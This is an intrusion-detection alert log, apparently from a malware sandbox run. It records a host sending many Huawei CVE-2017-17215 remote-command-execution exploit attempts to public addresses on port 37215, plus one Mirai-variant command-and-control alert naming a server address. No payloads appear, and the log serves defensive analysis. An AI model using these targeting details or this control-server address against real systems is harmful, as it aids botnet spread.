                                                        06/13/24-21:32:56.786520TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3485437215192.168.2.1441.17.189.175
                                                        06/13/24-21:32:15.608950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4569437215192.168.2.14197.248.142.77
                                                        06/13/24-21:33:15.253316TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3802837215192.168.2.14197.88.126.151
                                                        06/13/24-21:32:07.420337TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5988637215192.168.2.14156.203.103.29
                                                        06/13/24-21:33:13.232108TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4479837215192.168.2.14156.126.89.41
                                                        06/13/24-21:32:30.124408TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5337437215192.168.2.1441.65.249.83
                                                        06/13/24-21:31:57.093206TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5004837215192.168.2.14156.195.134.5
                                                        06/13/24-21:32:05.343972TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4980837215192.168.2.1441.188.99.164
                                                        06/13/24-21:33:09.127494TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3644237215192.168.2.1441.167.247.18
                                                        06/13/24-21:31:57.093816TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3725437215192.168.2.14156.28.204.125
                                                        06/13/24-21:32:40.374411TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6093037215192.168.2.14197.142.86.54
                                                        06/13/24-21:32:25.986642TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3493237215192.168.2.1441.125.181.128
                                                        06/13/24-21:32:21.783737TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4517837215192.168.2.1441.12.57.218
                                                        06/13/24-21:32:03.309362TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3501437215192.168.2.14156.228.243.239
                                                        06/13/24-21:32:25.977587TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3953237215192.168.2.14197.120.205.227
                                                        06/13/24-21:32:40.357839TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4879837215192.168.2.1441.109.249.190
                                                        06/13/24-21:32:50.630371TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4217637215192.168.2.14197.138.175.225
                                                        06/13/24-21:33:07.061068TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4075437215192.168.2.1441.236.11.196
                                                        06/13/24-21:33:00.866369TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3729037215192.168.2.14197.251.218.157
                                                        06/13/24-21:33:15.252558TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3377437215192.168.2.14197.19.78.93
                                                        06/13/24-21:32:13.547119TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4416837215192.168.2.1441.20.28.107
                                                        06/13/24-21:32:23.936823TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5005837215192.168.2.1441.93.89.148
                                                        06/13/24-21:32:19.731506TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4938637215192.168.2.14197.166.23.178
                                                        06/13/24-21:32:23.930821TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4682437215192.168.2.1441.187.173.220
                                                        06/13/24-21:32:09.456688TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3723837215192.168.2.14156.102.147.188
                                                        06/13/24-21:32:03.306176TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5274437215192.168.2.14156.40.117.185
                                                        06/13/24-21:32:30.124452TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5246637215192.168.2.1441.85.31.4
                                                        06/13/24-21:32:01.219925TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4337837215192.168.2.14156.115.77.90
                                                        06/13/24-21:32:21.782311TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4121037215192.168.2.14156.210.128.180
                                                        06/13/24-21:32:28.045092TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4814437215192.168.2.14156.17.30.84
                                                        06/13/24-21:32:09.457242TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3534637215192.168.2.14197.167.177.124
                                                        06/13/24-21:31:57.131802TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3983037215192.168.2.1441.101.112.239
                                                        06/13/24-21:32:50.614485TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4360837215192.168.2.1441.129.248.19
                                                        06/13/24-21:32:50.629888TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4533237215192.168.2.1441.32.221.250
                                                        06/13/24-21:32:34.212712TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5661237215192.168.2.1441.149.76.31
                                                        06/13/24-21:32:07.418042TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4653037215192.168.2.14156.193.183.124
                                                        06/13/24-21:32:03.274762TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4951637215192.168.2.14197.9.246.39
                                                        06/13/24-21:32:21.801448TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6004037215192.168.2.1441.53.24.152
                                                        06/13/24-21:32:25.971104TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5102437215192.168.2.14156.147.17.126
                                                        06/13/24-21:32:36.247054TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3778237215192.168.2.14197.157.108.23
                                                        06/13/24-21:32:19.731117TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4135837215192.168.2.14156.196.33.24
                                                        06/13/24-21:32:25.975424TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5917637215192.168.2.1441.183.208.65
                                                        06/13/24-21:32:25.978659TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5849837215192.168.2.14156.192.84.145
                                                        06/13/24-21:32:44.451151TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3969837215192.168.2.1441.18.45.91
                                                        06/13/24-21:32:58.843829TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5899437215192.168.2.1441.143.38.247
                                                        06/13/24-21:32:38.302422TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5877037215192.168.2.14197.45.182.35
                                                        06/13/24-21:31:57.090061TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3522637215192.168.2.14197.117.40.241
                                                        06/13/24-21:32:30.100303TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3608637215192.168.2.1441.13.113.141
                                                        06/13/24-21:32:50.615164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5739237215192.168.2.14197.0.227.139
                                                        06/13/24-21:32:07.404371TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4802837215192.168.2.1441.84.39.228
                                                        06/13/24-21:32:52.676023TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4115437215192.168.2.14156.254.129.243
                                                        06/13/24-21:32:23.943429TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5937037215192.168.2.14197.252.161.53
                                                        06/13/24-21:32:38.321593TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4879637215192.168.2.1441.171.168.77
                                                        06/13/24-21:33:04.992317TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4173237215192.168.2.14197.143.174.239
                                                        06/13/24-21:32:50.633389TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4524437215192.168.2.1441.83.65.105
                                                        06/13/24-21:32:28.024208TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5217037215192.168.2.1441.90.211.66
                                                        06/13/24-21:32:28.027624TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5625237215192.168.2.14197.19.201.201
                                                        06/13/24-21:32:15.631151TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3855437215192.168.2.14156.176.97.4
                                                        06/13/24-21:32:11.486183TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5003037215192.168.2.1441.197.9.76
                                                        06/13/24-21:32:21.785545TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4683637215192.168.2.14197.231.241.157
                                                        06/13/24-21:33:07.055796TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3311637215192.168.2.14197.107.9.131
                                                        06/13/24-21:32:05.376865TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4884237215192.168.2.14156.33.16.212
                                                        06/13/24-21:32:34.194871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4904037215192.168.2.14197.203.240.122
                                                        06/13/24-21:32:03.303881TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4552037215192.168.2.14197.126.60.187
                                                        06/13/24-21:32:40.353261TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3974637215192.168.2.1441.91.200.42
                                                        06/13/24-21:33:15.271380TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4253437215192.168.2.14197.177.191.104
                                                        06/13/24-21:31:57.154148TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3689437215192.168.2.14197.71.57.52
                                                        06/13/24-21:32:56.790638TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5694637215192.168.2.14156.156.118.195
                                                        06/13/24-21:32:01.246855TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3876637215192.168.2.14197.236.233.22
                                                        06/13/24-21:32:40.376723TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5724837215192.168.2.14197.22.95.105
                                                        06/13/24-21:31:59.176756TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3697437215192.168.2.14197.8.169.118
                                                        06/13/24-21:32:30.097149TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5419837215192.168.2.1441.81.97.154
                                                        06/13/24-21:33:09.091518TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4921037215192.168.2.14156.80.119.199
                                                        06/13/24-21:33:00.889368TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3659837215192.168.2.14156.179.86.25
                                                        06/13/24-21:33:09.127144TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4960237215192.168.2.14156.123.133.136
                                                        06/13/24-21:32:44.476715TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4199037215192.168.2.14156.34.215.160
                                                        06/13/24-21:33:17.309676TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4075637215192.168.2.1441.224.237.46
                                                        06/13/24-21:32:11.484975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3770837215192.168.2.14197.156.215.120
                                                        06/13/24-21:32:07.417683TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5728237215192.168.2.1441.47.177.55
                                                        06/13/24-21:32:44.475411TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4311437215192.168.2.1441.199.94.128
                                                        06/13/24-21:33:15.251770TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5464437215192.168.2.14156.224.224.178
                                                        06/13/24-21:32:11.487918TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3320837215192.168.2.1441.148.65.23
                                                        06/13/24-21:32:23.942228TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3966437215192.168.2.14156.97.20.251
                                                        06/13/24-21:32:52.677524TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4452237215192.168.2.1441.80.198.80
                                                        06/13/24-21:33:17.308787TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5983837215192.168.2.14197.51.83.53
                                                        06/13/24-21:31:57.153133TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5387837215192.168.2.14156.170.117.106
                                                        06/13/24-21:32:21.805919TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3643237215192.168.2.14156.121.67.243
                                                        06/13/24-21:32:38.301606TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4247437215192.168.2.1441.32.31.94
                                                        06/13/24-21:32:52.660758TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4390037215192.168.2.14156.136.245.189
                                                        06/13/24-21:32:11.487271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5559637215192.168.2.14197.127.123.29
                                                        06/13/24-21:32:36.263033TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4447637215192.168.2.14197.116.153.190
                                                        06/13/24-21:32:36.266901TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4356237215192.168.2.14197.158.37.150
                                                        06/13/24-21:33:13.212098TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4426437215192.168.2.1441.60.91.8
                                                        06/13/24-21:32:36.264433TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3912437215192.168.2.14156.209.235.34
                                                        06/13/24-21:32:46.503724TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4642237215192.168.2.14156.168.7.69
                                                        06/13/24-21:32:13.566102TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5351637215192.168.2.1441.151.96.194
                                                        06/13/24-21:33:13.210230TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3768837215192.168.2.14156.35.235.5
                                                        06/13/24-21:32:23.929054TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3775837215192.168.2.1441.167.24.148
                                                        06/13/24-21:32:15.608826TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5482637215192.168.2.14197.230.13.191
                                                        06/13/24-21:31:59.175929TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5925437215192.168.2.14156.137.45.2
                                                        06/13/24-21:32:23.833263TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5081237215192.168.2.14156.230.9.78
                                                        06/13/24-21:32:50.612271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5435237215192.168.2.14156.58.232.156
                                                        06/13/24-21:32:13.566141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4413837215192.168.2.14197.8.233.234
                                                        06/13/24-21:32:23.833937TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4287637215192.168.2.14156.85.44.84
                                                        06/13/24-21:33:13.227384TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5200237215192.168.2.14156.26.234.11
                                                        06/13/24-21:33:15.253219TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5955037215192.168.2.14197.84.80.64
                                                        06/13/24-21:32:11.487351TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5382437215192.168.2.1441.243.214.182
                                                        06/13/24-21:32:15.632899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6085437215192.168.2.1441.187.196.192
                                                        06/13/24-21:32:07.402899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5220037215192.168.2.14156.55.220.119
                                                        06/13/24-21:32:23.833124TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3584637215192.168.2.14156.99.74.250
                                                        06/13/24-21:31:57.129916TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5433837215192.168.2.14156.70.243.82
                                                        06/13/24-21:32:38.301312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3286037215192.168.2.14197.119.54.57
                                                        06/13/24-21:32:54.707929TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3465637215192.168.2.14156.163.164.31
                                                        06/13/24-21:33:11.157495TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3489037215192.168.2.14197.216.144.121
                                                        06/13/24-21:31:57.132426TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5848637215192.168.2.14197.251.185.162
                                                        06/13/24-21:32:03.276375TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3380437215192.168.2.14156.236.184.245
                                                        06/13/24-21:32:46.501959TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5060037215192.168.2.1441.254.224.60
                                                        06/13/24-21:32:42.420033TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5385637215192.168.2.14156.201.38.210
                                                        06/13/24-21:32:09.439026TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3473837215192.168.2.14156.69.189.8
                                                        06/13/24-21:32:36.247097TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5679237215192.168.2.14156.225.155.1
                                                        06/13/24-21:32:32.154290TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3366237215192.168.2.14197.16.228.76
                                                        06/13/24-21:32:25.977275TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3799837215192.168.2.14197.99.155.7
                                                        06/13/24-21:32:30.124994TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5638837215192.168.2.1441.107.36.157
                                                        06/13/24-21:33:17.002193TCP2840516ETPRO TROJAN ELF/BASHLITE/Mirai Cayosin Variant CnC Server Message455448720103.82.38.94192.168.2.14
                                                        06/13/24-21:33:13.214634TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4689837215192.168.2.14156.28.201.193
                                                        06/13/24-21:32:30.128404TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5800437215192.168.2.1441.75.121.102
                                                        06/13/24-21:32:23.835030TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6030237215192.168.2.14197.112.18.153
                                                        06/13/24-21:32:56.789232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3705037215192.168.2.14156.192.19.155
                                                        06/13/24-21:32:46.525587TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4565037215192.168.2.14197.213.162.1
                                                        06/13/24-21:32:23.941669TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5114437215192.168.2.14156.25.119.67
                                                        06/13/24-21:32:44.458156TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5922437215192.168.2.14156.135.155.58
                                                        06/13/24-21:32:34.191811TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4820237215192.168.2.14197.101.240.197
                                                        06/13/24-21:32:42.424446TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5094837215192.168.2.1441.154.141.211
                                                        06/13/24-21:32:23.942126TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6091237215192.168.2.14197.206.166.240
                                                        06/13/24-21:31:57.132655TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4770237215192.168.2.1441.66.97.197
                                                        06/13/24-21:32:48.553929TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4191837215192.168.2.14156.8.63.164
                                                        06/13/24-21:32:54.707218TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4883637215192.168.2.1441.6.124.149
                                                        06/13/24-21:32:52.655744TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3530837215192.168.2.14156.35.28.186
                                                        06/13/24-21:32:34.193960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4098237215192.168.2.14156.140.196.20
                                                        06/13/24-21:33:05.014438TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5280437215192.168.2.1441.80.216.21
                                                        06/13/24-21:32:17.676570TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5464837215192.168.2.14197.37.125.132
                                                        06/13/24-21:32:38.296874TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4197037215192.168.2.14197.63.192.113
                                                        06/13/24-21:32:50.614131TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3629637215192.168.2.14197.232.171.145
                                                        06/13/24-21:33:09.091083TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5829237215192.168.2.14197.148.90.62
                                                        06/13/24-21:32:48.569681TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5915837215192.168.2.14197.12.213.71
                                                        06/13/24-21:32:21.785716TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5261037215192.168.2.14197.55.22.192
                                                        06/13/24-21:32:30.079675TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4265237215192.168.2.14156.207.3.64
                                                        06/13/24-21:32:03.310328TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4362637215192.168.2.1441.99.254.239
                                                        06/13/24-21:33:07.037641TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4007237215192.168.2.1441.200.103.245
                                                        06/13/24-21:32:58.841120TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4520837215192.168.2.14156.44.249.22
                                                        06/13/24-21:33:11.159334TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3861237215192.168.2.14197.126.185.19
                                                        06/13/24-21:32:46.524040TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5484237215192.168.2.1441.191.48.5
                                                        06/13/24-21:33:00.872125TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4560237215192.168.2.1441.57.211.59
                                                        06/13/24-21:32:25.969836TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5053037215192.168.2.14156.12.29.185
                                                        06/13/24-21:32:48.554804TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4813437215192.168.2.14156.132.58.85
                                                        06/13/24-21:33:00.870148TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5874037215192.168.2.14156.203.144.199
                                                        06/13/24-21:32:48.571576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5137237215192.168.2.1441.251.107.53
                                                        06/13/24-21:32:01.219029TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5405837215192.168.2.14156.126.111.142
                                                        06/13/24-21:32:21.785984TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3728637215192.168.2.14197.167.195.15
                                                        06/13/24-21:33:07.057520TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5033637215192.168.2.1441.204.204.255
                                                        06/13/24-21:32:52.660707TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3680437215192.168.2.14197.41.177.193
                                                        06/13/24-21:32:34.194129TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3629837215192.168.2.1441.19.215.238
                                                        06/13/24-21:32:42.408318TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4732637215192.168.2.14197.112.135.82
                                                        06/13/24-21:33:11.180680TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4660837215192.168.2.14156.90.172.213
                                                        06/13/24-21:32:56.757740TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4085237215192.168.2.14197.127.77.241
                                                        06/13/24-21:32:07.401627TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5184237215192.168.2.14197.198.207.241
                                                        06/13/24-21:32:15.606821TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5469037215192.168.2.14156.107.159.237
                                                        06/13/24-21:33:15.256388TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4505237215192.168.2.1441.220.10.16
                                                        06/13/24-21:32:28.044860TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4436037215192.168.2.1441.250.53.222
                                                        06/13/24-21:31:57.094178TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3548437215192.168.2.14156.194.188.235
                                                        06/13/24-21:32:01.238345TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3389437215192.168.2.1441.7.253.170
                                                        06/13/24-21:33:15.253040TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4876637215192.168.2.1441.219.111.77
                                                        06/13/24-21:31:57.091344TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3412837215192.168.2.14197.103.12.224
                                                        06/13/24-21:32:48.550707TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5089237215192.168.2.1441.15.103.202
                                                        06/13/24-21:31:57.152739TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5685237215192.168.2.14197.75.113.17
                                                        06/13/24-21:32:42.403266TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4148237215192.168.2.1441.39.9.122
                                                        06/13/24-21:32:23.932129TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3846637215192.168.2.1441.20.67.35
                                                        06/13/24-21:32:28.045280TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5573837215192.168.2.1441.187.221.211
                                                        06/13/24-21:33:07.040034TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5382637215192.168.2.14156.161.162.141
                                                        06/13/24-21:32:09.455958TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4368437215192.168.2.14197.188.136.155
                                                        06/13/24-21:32:21.804495TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3425437215192.168.2.1441.16.178.215
                                                        06/13/24-21:32:01.219148TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6040437215192.168.2.14156.193.243.130
                                                        06/13/24-21:32:21.781365TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3911837215192.168.2.1441.79.27.30
                                                        06/13/24-21:32:30.098343TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5062037215192.168.2.14197.48.131.177
                                                        06/13/24-21:32:48.553772TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4826037215192.168.2.14156.153.121.138
                                                        06/13/24-21:32:52.658859TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5326437215192.168.2.14156.39.213.77
